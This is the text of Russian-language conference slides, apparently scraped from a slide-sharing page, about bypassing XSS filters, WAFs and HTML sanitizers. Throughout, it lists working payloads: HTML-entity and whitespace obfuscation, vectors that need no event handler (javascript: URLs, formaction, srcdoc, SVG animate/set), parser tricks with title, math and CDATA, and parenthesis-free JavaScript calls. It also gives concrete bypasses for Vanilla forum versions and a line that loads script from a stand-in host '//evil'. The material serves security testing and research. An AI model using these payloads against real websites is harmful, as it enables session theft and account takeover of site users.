XSS. Обходы фильтров и защит.

XSS. Обходы
фильтров и защит.
Антон Лопаницын
@i_bo0om
Игорь Сак-Саковский
@psych0tr1a

Ты – один, а событий браузера много, найди их все!
Часто пропускают события вида onplay и другие, которые были
введены в HTML5.

Внедрить собственный сценарий с внешнего сайта - победа

Импорт другой страницы
<link rel=“import” href=“//mysite”>

Переопределение базового адреса текущего документа
<base href=“//mysite”>
Все относительные ссылки после вызова base будут
вызываться из указанного источника.

• Что попадает в атрибуты можно преобразовать в другое
представление символов – HTML сущности (мнемоники)

Например:
<a href=“javascript&colon;alert()”>
&colon; : :

Некоторые entities игнорируются вовсе
Табуляция &Tab; 	
Перенос строки &NewLine; 
 


Перед шестнадцатеричными и десятичными сущностями могут
быть нули.
А перед &#0-9; вовсе и не быть нулей
Например 	 - валидная табуляция

А еще точка с запятой не обязательна, если следующий
после entity символ не входит в его группу символов 

И как я уже говорил, во всех атрибутах
<a
href="//\/&commat;g&NoBreak;o&ZeroWidthSpace;o&z
wnj;g&zwj;le&NewLine;.&Tab;com">clickme</a>
Это ссылка на google.com

В протоколе data не обязательно указывать тип контента
<script src=data:,alert()>

Для выполнения функции не обязательно использовать скобки!
… И точку
… И знак равно
… И буквы вообще

document.cookie == document[‘cookie’]
document[‘location’]=javascript:alert()
Точки не нужны

• Его можно использовать для вызова функций
<script>alert`1`</script>
• Его можно использовать для передачи строки
document[`cookie`]
• Им можно «вырезать» неугодные нам части при двух уязвимых
параметрах, или если наши данные вставляются 2 раза.
Бэктик – твой лучший друг

document.documentElement.innerHTML=location.hash
(пишем на страницу данные после # в ссылке)
https://example.com/page.html#<script>alert()</script>
Отлично работают в паре

Все что между /слэшами/ - регулярное выражение
alert(/1/)
Добавление к регулярному выражению .source – возвращает
оригинальную строку
eval(/alert()/.source)

Обращения в контексте текущего домена не будет заблокировано
хромом
Например если попытаться вызвать <script src=/test.js>
Импорт на импорт

Если в пути у сайта есть XSS, как часто бывает:
"Страницы /<script>alert()</script>/index.html не существует!”
Ты спокойно можешь импортировать xss в текущую страницу
<link rel=import href="/<script>alert()</script>/index.html">

example.com
/<link rel=import href="/<script>alert()</script>/index.html">/index.html

Импортом можно вызывать ранее недоступные нам функции
<link rel=“import” href=“/page.html”>
(страница, где подключается jquery)
=>
<svg onload=$.GetScript(‘//evil’)>

Загруженный файл (например, изображение) может быть
интерпретирован как js*
Но еще круче, любой загруженный файл может быть
интерпретирован как html
?id=“><link rel=import href=“/static/userfile/myphoto.jpg”>

Внутри строк js тоже много фич, например перевод символов в
другие представления (x22, u0022), неявные вызовы функций

• http://utf-8.jp/public/jjencode.html
Вызов функции с помощью кучи спецсимволов))
• https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html
Вызов функции с помощью символов [+|>]
• http://www.jsfuck.com/
Вызов функции с помощью символов ()+[]!
Ну и прочая наркомания

• onerror=eval;throw'=alertx281x29’
• toString=alert;window+''
• setTimeout`confirmu0028document.domainx29`
• set.constructor`alertx28document.domainx29```

XSS. Обходы фильтров и защит.

Где можно встретить HTML фильтры?
• WYSIWYG редакторы
• WAFы
• WEB почта
• И ещё где-нибудь в интернете

Какие бывают фильтры?
• Чёрный список
<randomtag onevent="test">randomtag</randomtag>
<randomtag>randomtag text</randomtag> Randomtag text
HTML code
• Белый список
<randomtag onevent="test">randomtag text</randomtag>

Фаззинг HTML
• Фильтр по чёрному списку
- Фаззим атрибуты событий если пропустило onevent
- Фаззим XSS вектора без событий
- Фаззим HTML теги
- Фаззим HTML теги и особенности их фильтрации
• Фильтр по белому списку
- Фаззим XSS вектора без событий
- Фаззим HTML теги и особенности их фильтрации

XSS вектора без событий

Атрибут href
<a href="javascript:alert(1)">click</a>
<a target="random" href="data:text/html,<script>opener.alert(1)</script>">click</a>

Атрибут href
<base href="javascript:alert(1)">
<a href="#">click</a>
</base>

Атрибут formaction
<form>
<button formaction="javascript:alert(1)">click</button>
</form>

Атрибут src
<embed src="javascript:alert(1)"></embed>

Атрибут action
<form action="javascript:alert(1)">
<button>click</button>
</form>

Атрибут src
<iframe src="javascript:alert(1)"></iframe>
Атрибут srcdoc
<iframe srcdoc="<script>alert(1)</script>"></iframe>

<form>
<input type="submit" formaction="javascript:alert(1)" value="click" />
<input type="image" src="https://google.com/favicon.ico" formaction="javascript:alert(1)" />
</form>

Атрибут action
<isindex action="javascript:alert(1)" type="submit" value="click"></isindex>
<isindex action="javascript:alert(1)" type="image" src="https://google.com/favicon.ico"></isindex>
<isindex formaction="javascript:alert(1)" type="submit" value="click"></isindex>
<isindex formaction="javascript:alert(1)" type="image" src="https://google.com/favicon.ico"></isindex>

Атрибут href
<link rel="import" href="data:,<script>alert(1)</script>">

Атрибут xml:base
<math xml:base="javascript:alert(1)//">
<mrow href="#">click</mrow>
<mtext>
<iframe src="#"></iframe>
</mtext>
</math>
Атрибут xlink:href
<math>
<randomtag xlink:href="javascript:alert(1)">click</randomtag>
</math>

Атрибут data [FireFox only]
<object data="javascript:alert(1)">
+ Тег <param> и аттрибут value
<object allowscriptaccess="always">
<param name="src" value="https://html5sec.org/test.swf">
</object>
<param name="movie" value="https://html5sec.org/test.swf">
</object>
<param name="code" value="https://html5sec.org/test.swf">
</object>
<param name="url" value="https://html5sec.org/test.swf">
</object>

Аттрибут xml:base [FireFox only]
<svg xml:base="javascript:alert(1)//">
<a href="#">
<circle cx="100" cy="75" r="50"></circle>
</a>
<desc>
<iframe src="#"></iframe>
</desc>
</svg>
+ Тег <script> и аттрибут xlink:href
<svg>
<script xlink:href="data:,alert(1)"></script>
</svg>

+ Тег <a> и аттрибут xlink:href
<svg>
<a xlink:href="javascript:alert(1)">click</a>
</svg>
+ Тег <use> и аттрибут xlink:href [FireFox only]
<svg>
<use
xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0ic3ZnaWQiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8
yMDAwL3N2ZyI+Cgk8Zm9yZWlnbk9iamVjdD4KCQk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE
5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+Cgk8L2ZvcmVpZ25PYmplY3Q+Cjw
vc3ZnPg==#svgid" />
</svg>

+ Тег <animate> и аттрибут from
<svg>
<a>
<animate attributeName="href" from="javascript:alert(1)" to="to" dur="100" begin="0"
repeatCount=1 />
<circle cx="150" cy="100" r=50></circle>
</a>
</svg>
+ Тег <animate> и аттрибут to
<svg>
<a>
<animate attributeName="href" from="" to="javascript:alert(1)" repeatCount="1" />
<circle cx="150" cy="100" r=50></circle>
</a>
</svg>

+ Тег <set> и аттрибут to
<svg>
<a>
<set attributeName="href" from="" to="javascript:alert(1)" attributeType="XML"/>
<circle cx="100" cy="75" r="50"></circle>
</a>
</svg>

Особенности фильтрации.
Волшебные тэги
Конец

<select><option>select</option></select>
<math>math</math>
<svg>svg</svg>
Волшебные теги
<style><test test="<test>">test</test></style>
Волшебный плейнтекст который невозможно закрыть
<plaintext><test test="<test>">test</test>
Коментарии

<![CDATA[<test test="<test>">test</test>]]>
<!<test test="<test>">test<!</test>
<?<test test="<test>">test<?</test>

• Не фильтруется содержимое одного из волшебных тегов.
<title><test test=“<test>”></title>

• Не фильтруется содержимое одного из волшебных тегов.
• XSS вектор:
<title><img alt=“</title><svg/onload=alert(1)>”></title>

• Не фильтруется содержимое одного из волшебных тегов, но
значение атрибутов энкодится в сущности.

- Фаззим другие атрибуты

- Фаззим другие атрибуты
- Используем теги math/svg/title
<math>
<title>
<i>
<script>alert(1)</script>
</i>
</title>
</math>

• Парсер CSS

• Парсер CSS
- Фаззинг свойств CSS
- Применяем теги math/svg/title
<style>
body {
%color%:"<test test=test>";
}
</style>

• Волшебные теги вернулись отфильтрованными, но содержимое
коментариев нет.

<![CDATA[<test test="<test>">test</test>]]>
<?<test test="<test>">test<!</test>

• Многострочный комментарий внутри волшебного тега внутри
SVG.
• [1] - title, desc, foreignObject
• [2] - title, style, xmp, textarea, iframe, noframes, noembed, noscript
<svg>
<title [1]>
<title [2]>

</title>
</title>
</svg>

• Секция CDATA в HTML
<![CDATA[<script>alert(1)</script>]]>

<![CDATA[><script>alert(1)</script>]]>

• Загадочные комментарии и трюк с волшебными тегами
<title><?<img alt=“<?</title><?<iframe src=javascript:alert(1)>”></title>
<![CDATA[><script>alert(1)</script>]]>

• Фаззинг вложенных тегов.
• Реальные находки в Vanilla forum (HTMLawed)
- Vanilla < 2.1.1 (реузльтат <img alt="<img qwe">)
XSS вектор:
<%тег%[0x0c, 0x0d, 0x0a, 0x09, 0x20, 0x2f]%атр%="<%т2%[0x0c, 0x0d, 0x0a, 0x09, 0x20, 0x2f] %атр2%>">
<%тег%[0x0c, 0x0d, 0x0a, 0x09, 0x20, 0x2f]%атр%='<%т2%[0x0c, 0x0d, 0x0a, 0x09, 0x20, 0x2f] %атр2%>'>
<img src="src" alt="image">"><br>img alt="<img qwe" src="src">
<img alt="<img onerror=alert(1)//">

- Vanilla < 2.2.1 (результат <font color='<img//asd'>)
XSS вектор:
span style="color: <img//asd;">
<font color='<img//onerror="alert(1)"src=s'>

Подписываемся на
канал, ставим
лайки.
Антон Лопаницын
@i_bo0om
Игорь Сак-Саковский
@psych0tr1a

XSS. Обходы фильтров и защит.

More Related Content

What's hot (18)

Similar to XSS. Обходы фильтров и защит. (20)

More from Дмитрий Бумов (20)

XSS. Обходы фильтров и защит.